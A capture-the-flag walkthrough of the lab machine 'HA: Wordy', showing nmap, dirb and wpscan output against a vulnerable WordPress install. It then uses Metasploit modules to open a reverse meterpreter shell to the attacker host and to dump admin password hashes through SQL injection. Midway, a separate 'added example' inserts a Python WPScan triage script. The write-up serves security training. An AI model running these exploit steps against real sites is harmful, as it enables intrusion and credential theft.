ha-wordy-Write-up

Information Gathering

➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:08 CST
Nmap scan report for 192.168.116.1
Host is up (0.0025s latency).
Nmap scan report for 192.168.116.138
Host is up (0.00072s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.94 seconds
➜  ~ nmap -A -T4 192.168.116.138 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:09 CST
Nmap scan report for 192.168.116.138
Host is up (0.0039s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
➜  ~
  • The IP is 192.168.116.138; only port 80 is open, and the home page is still the Apache2 default page.
  • Scan for directories first; -r disables recursive scanning.
➜  ~ dirb http://192.168.116.138 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Sep 25 22:17:39 2019
URL_BASE: http://192.168.116.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.116.138/ ----
+ http://192.168.116.138/index.html (CODE:200|SIZE:10918)                                                                                                                                                                                     
+ http://192.168.116.138/info.php (CODE:200|SIZE:15)                                                                                                                                                                                          
==> DIRECTORY: http://192.168.116.138/javascript/                                                                                                                                                                                             
+ http://192.168.116.138/server-status (CODE:403|SIZE:280)                                                                                                                                                                                    
==> DIRECTORY: http://192.168.116.138/wordpress/                                                                                                                                                                                              
                                                                                                                                                                                                                                              
-----------------
END_TIME: Wed Sep 25 22:17:42 2019
DOWNLOADED: 4612 - FOUND: 3
➜  ~
  • Found an info.php, and it is WordPress again.
➜  ~ curl "http://192.168.116.138/info.php"          
192.168.116.138%
➜  ~
  • Visiting info.php returns the server's IP address, so next scan the WordPress install.
➜  ~ wpscan --url http://192.168.116.138/wordpress/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.116.138/wordpress/
[+] Started: Wed Sep 25 22:23:22 2019

Interesting Finding(s):

[+] http://192.168.116.138/wordpress/
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.116.138/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.116.138/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.116.138/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://192.168.116.138/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Latest, released on 2019-09-05).
 | Detected By: Rss Generator (Passive Detection)
 |  - http://192.168.116.138/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://192.168.116.138/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: twentysixteen
 | Location: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/
 | Latest Version: 2.0 (up to date)
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/readme.txt
 | Style URL: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Detected By: Css Style (Passive Detection)
 |
 | Version: 2.0 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3, Match: 'Version: 2.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8609
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
 | Last Updated: 2019-05-10T16:05:00.000Z
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
 |     Fixed in: 3.1.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
 |      - https://www.exploit-db.com/exploits/36374/
 |      - https://packetstormsecurity.com/files/130845/
 |      - https://packetstormsecurity.com/files/131515/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
 |
 | [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7985
 |      - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
 |      - https://github.com/scaron/prettyphoto/issues/149
 |      - https://github.com/wpscanteam/wpscan/issues/818
 |
 | Version: 3.1.3 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] site-editor
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9044
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - http://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/site-editor/readme.txt

[+] slideshow-gallery
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 5 vulnerabilities identified:
 |
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 |     Fixed in: 1.4.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7532
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
 |      - https://www.exploit-db.com/exploits/34681/
 |      - https://www.exploit-db.com/exploits/34514/
 |      - http://seclists.org/bugtraq/2014/Sep/1
 |      - https://packetstormsecurity.com/files/131526/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
 |     Fixed in: 1.5.3.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8263
 |      - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
 |      - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
 |
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8786
 |      - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
 |      - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
 |
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8795
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
 |      - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
 |      - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
 |
 | [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
 |     Fixed in: 1.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9354
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18017
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18018
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18019
 |      - https://plugins.trac.wordpress.org/changeset?reponame=&new=1974812%40slideshow-gallery&old=1907382%40slideshow-gallery
 |      - https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
 |
 | Version: 1.4.6 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt

[+] wp-easycart-data
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-easycart-data/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] wp-support-plus-responsive-ticket-system
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
 |     Fixed in: 8.0.0
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8699
 |      - https://www.exploit-db.com/exploits/40939/
 |      - http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
 |      - https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
 |     Fixed in: 8.0.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8949
 |      - https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 9.0.2 - Multiple Authenticated SQL Injection
 |     Fixed in: 9.0.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9041
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000131
 |      - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
 |      - https://plugins.trac.wordpress.org/changeset/1814103/wp-support-plus-responsive-ticket-system
 |
 | [!] Title: WP Support Plus Responsive Ticket System <= 9.1.1 - Stored XSS
 |     Fixed in: 9.1.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9235
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7299
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15331
 |      - https://cert.kalasag.com.ph/news/research/cve-2019-7299-stored-xss-in-wp-support-plus-responsive-ticket-system/
 |      - https://plugins.trac.wordpress.org/changeset/2024484/wp-support-plus-responsive-ticket-system
 |
 | Version: 7.1.3 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] wp-symposium
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/
 | Last Updated: 2015-08-21T12:36:00.000Z
 | [!] The version is out of date, the latest version is 15.8.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 7 vulnerabilities identified:
 |
 | [!] Title: WP Symposium 13.04 - Unvalidated Redirect
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6383
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2694
 |
 | [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
 |     Reference: https://wpvulndb.com/vulnerabilities/6390
 |
 | [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7716
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
 |      - https://www.exploit-db.com/exploits/35543/
 |      - https://www.exploit-db.com/exploits/35778/
 |      - http://www.homelab.it/index.php/2014/12/11/wordpress-wp-symposium-shell-upload/
 |      - https://www.youtube.com/watch?v=pF8lIuLT6Vs
 |      - http://blog.sucuri.net/2014/12/wp-symposium-zero-day-vulnerability-dangers.html
 |      - https://packetstormsecurity.com/files/129884/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
 |
 | [!] Title: WP Symposium <= 15.1 - SQL Injection
 |     Fixed in: 15.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7902
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
 |      - https://www.exploit-db.com/exploits/37080/
 |      - http://web.archive.org/web/20150718010246/http://permalink.gmane.org/gmane.comp.security.oss.general/16479
 |      - https://packetstormsecurity.com/files/131801/
 |
 | [!] Title: WP Symposium <=  15.5.1 - Unauthenticated SQL Injection
 |     Fixed in: 15.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8140
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
 |      - https://www.exploit-db.com/exploits/37824/
 |      - https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
 |
 | [!] Title: WP Symposium <= 15.1 - Blind SQL Injection
 |     Fixed in: 15.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8148
 |      - https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
 |
 | [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8175
 |      - http://cxsecurity.com/issue/WLB-2015090024
 |
 | Version: 15.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Sep 25 22:23:25 2019
[+] Requests Done: 78
[+] Cached Requests: 5
[+] Data Sent: 23.706 KB
[+] Data Received: 17.527 MB
[+] Memory used: 207.039 MB
[+] Elapsed time: 00:00:03
➜  ~
  • This time the scan really did turn up exploitable vulnerabilities: file inclusion, SQL injection, file upload and RCE are all there.
  • SQL injection:
https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
https://www.exploit-db.com/exploits/40939/
  • File inclusion:
https://www.exploit-db.com/exploits/40290/
  • File upload:
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
https://www.exploit-db.com/exploits/36374/
https://www.exploit-db.com/exploits/34681/
https://www.exploit-db.com/exploits/34514/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
  • Authentication bypass:
https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
  • Exploit links: the Rapid7 ones can be used directly in MSF; the exploit-db ones have to be tested by hand.
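The WPScan report above is long, and what actually matters for remediation is which plugins are behind the "Fixed in" version of each finding. As an added example (not part of this write-up or of WPScan), the following Python parses WPScan's plain-text plugin blocks into a triage summary: installed version, latest version, whether an update is pending, and which listed vulnerabilities still apply. The SAMPLE input is constructed by shortening three plugin blocks from the scan above; the line patterns it matches are the ones visible in that output.

```python
"""Triage helper for WPScan's plain-text plugin report (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Regexes for the lines WPScan prints inside a "[+] <plugin-slug>" block.
PLUGIN_RE = re.compile(r"^\[\+\] ([a-z0-9-]+)$")
VERSION_RE = re.compile(r"^Version: (\S+) \(\d+% confidence\)")
LATEST_RE = re.compile(r"^Latest Version: (\S+) \(up to date\)")
OUTDATED_RE = re.compile(r"the latest version is (\S+)$")
TITLE_RE = re.compile(r"^\[!\] Title: (.+)$")
FIXED_RE = re.compile(r"^Fixed in: (\S+)$")


@dataclass
class Vuln:
    title: str
    fixed_in: Optional[str] = None


@dataclass
class Plugin:
    slug: str
    version: Optional[str] = None
    latest: Optional[str] = None
    vulns: List[Vuln] = field(default_factory=list)


def _set_fixed(plugin, value):
    # "Fixed in" always follows the "[!] Title" line it belongs to.
    if plugin.vulns:
        plugin.vulns[-1].fixed_in = value


HANDLERS = (
    (VERSION_RE, lambda p, v: setattr(p, "version", v)),
    (LATEST_RE, lambda p, v: setattr(p, "latest", v)),
    (OUTDATED_RE, lambda p, v: setattr(p, "latest", v)),
    (TITLE_RE, lambda p, v: p.vulns.append(Vuln(v))),
    (FIXED_RE, _set_fixed),
)


def version_key(v):
    # Numeric tuple so "1.6.12" sorts after "1.6.5"; a string compare would not.
    return tuple(int(part) if part.isdigit() else 0 for part in v.split("."))


def parse_wpscan(text):
    plugins, current = [], None
    for raw in text.splitlines():
        m = PLUGIN_RE.match(raw)
        if m:
            current = Plugin(slug=m.group(1))
            plugins.append(current)
            continue
        if current is None or not raw.startswith(" |"):
            continue
        line = raw[2:].strip()  # drop the " |" gutter WPScan indents with
        for pattern, apply in HANDLERS:
            m = pattern.search(line)
            if m:
                apply(current, m.group(1))
                break
    return plugins


def is_affected(plugin, vuln):
    """Assume exposed unless the installed version is at or past the fix."""
    if plugin.version is None or vuln.fixed_in is None:
        return True
    return version_key(plugin.version) < version_key(vuln.fixed_in)


def triage(text):
    report = {}
    for p in parse_wpscan(text):
        needs_update = (p.version is not None and p.latest is not None
                        and version_key(p.version) < version_key(p.latest))
        report[p.slug] = {
            "version": p.version,
            "latest": p.latest,
            "needs_update": needs_update,
            "affected": [v.title for v in p.vulns if is_affected(p, v)],
        }
    return report


# Constructed input: three plugin blocks shortened from the scan output above.
SAMPLE = """\
[+] reflex-gallery
 | Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
 |     Fixed in: 3.1.4
 |
 | [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |
 | Version: 3.1.3 (80% confidence)

[+] site-editor
 | Latest Version: 1.1.1 (up to date)
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |
 | Version: 1.1.1 (80% confidence)

[+] wp-easycart-data
 | The version could not be determined.
"""

if __name__ == "__main__":
    for slug, info in triage(SAMPLE).items():
        print(slug, info)
```

A finding with no "Fixed in" line (site-editor here) is treated as still applicable, and a plugin whose version could not be determined is reported with an empty list rather than guessed at; both are the conservative choice when the output feeds a patching decision.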
➜  ~ wpscan --enumerate p --url http://192.168.116.138/wordpress/ |grep exp   
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://www.exploit-db.com/exploits/36374/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
 |      - https://www.exploit-db.com/exploits/34681/
 |      - https://www.exploit-db.com/exploits/34514/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
 |      - https://www.exploit-db.com/exploits/40939/
 |      - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
 |      - https://www.exploit-db.com/exploits/35543/
 |      - https://www.exploit-db.com/exploits/35778/
 |      - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
 |      - https://www.exploit-db.com/exploits/37080/
 |      - https://www.exploit-db.com/exploits/37824/
➜  ~
  • For convenience I just used MSF directly; all of these should work.
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options 

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.116.138  yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress       yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.116.1    yes       The listen address (an interface may be specified)
   LPORT  7788             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Reflex Gallery 3.1.3


msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > 
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > run 

[*] Started reverse TCP handler on 192.168.116.1:7788 
[+] Our payload is at: QkwaQFsdu.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.138:41290) at 2019-09-26 10:28:04 +0800
[+] Deleted QkwaQFsdu.php
meterpreter >

SQL Injection

  • Then I tried the others in turn; the second one needs a username and password, so it could not be tested.
msf5 exploit(unix/webapp/wp_symposium_shell_upload) > use auxiliary/admin/http/wp_symposium_sql_injection 
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > show options 

Module options (auxiliary/admin/http/wp_symposium_sql_injection):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path to the wordpress application
   URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
   VHOST                        no        HTTP server virtual host

msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set rhosts 192.168.116.138
rhosts => 192.168.116.138
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set targeturi /wordpress
targeturi => /wordpress
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > run 
[*] Running module against 192.168.116.138

[+] 192.168.116.138:80 - admin           $P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0. abc@gmail.com
[+] 192.168.116.138:80 -                                                    
[+] 192.168.116.138:80 - aarti           $P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0 aarti@gmail.com
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_symposium_sql_injection) >
  • The SQL injection retrieved the passwords, but they are hashed, and cracking them with john got nowhere.
  • Back in the first session, I changed to the home directory and found the first flag.
meterpreter > cd raj
meterpreter > ls
Listing: /home/raj
==================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  4770  fil   2019-09-11 12:54:51 +0800  .ICEauthority
100600/rw-------  232   fil   2019-09-11 12:57:45 +0800  .bash_history
100644/rw-r--r--  220   fil   2019-09-09 14:15:07 +0800  .bash_logout
100644/rw-r--r--  3771  fil   2019-09-09 14:15:07 +0800  .bashrc
40700/rwx------   4096  dir   2019-09-09 23:47:31 +0800  .cache
40700/rwx------   4096  dir   2019-09-09 21:20:39 +0800  .config
40700/rwx------   4096  dir   2019-09-09 21:20:05 +0800  .dbus
40700/rwx------   4096  dir   2019-09-09 15:51:12 +0800  .gnupg
40700/rwx------   4096  dir   2019-09-09 21:20:06 +0800  .gvfs
40700/rwx------   4096  dir   2019-09-09 14:20:30 +0800  .local
40700/rwx------   4096  dir   2019-09-09 14:34:23 +0800  .mozilla
100600/rw-------  39    fil   2019-09-09 15:23:00 +0800  .mysql_history
100644/rw-r--r--  807   fil   2019-09-09 14:15:07 +0800  .profile
40700/rwx------   4096  dir   2019-09-09 15:51:12 +0800  .ssh
100644/rw-r--r--  0     fil   2019-09-09 14:21:21 +0800  .sudo_as_admin_successful
40755/rwxr-xr-x   4096  dir   2019-09-10 00:23:02 +0800  Desktop
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Documents
40755/rwxr-xr-x   4096  dir   2019-09-09 16:23:53 +0800  Downloads
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Music
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Pictures
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Public
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Templates
40755/rwxr-xr-x   4096  dir   2019-09-09 14:20:38 +0800  Videos
100644/rw-r--r--  8980  fil   2019-09-09 14:15:07 +0800  examples.desktop
100644/rw-r--r--  41    fil   2019-09-10 12:06:56 +0800  flag1.txt
40755/rwxr-xr-x   4096  dir   2019-09-09 16:18:54 +0800  plugin

meterpreter > cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu
meterpreter > 
➜  VulnHub echo "aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu" |base64 -d
https://www.hackingarticles.in%
  • In the web root there is a notes.txt file and an encrypted zip archive.
www-data@ubuntu:/var/www/html$ ls
ls
index.html  info.php  notes.txt  secret.zip  wordpress
www-data@ubuntu:/var/www/html$ cat notes.txt
cat notes.txt
You Need to ZIP Your Wayout
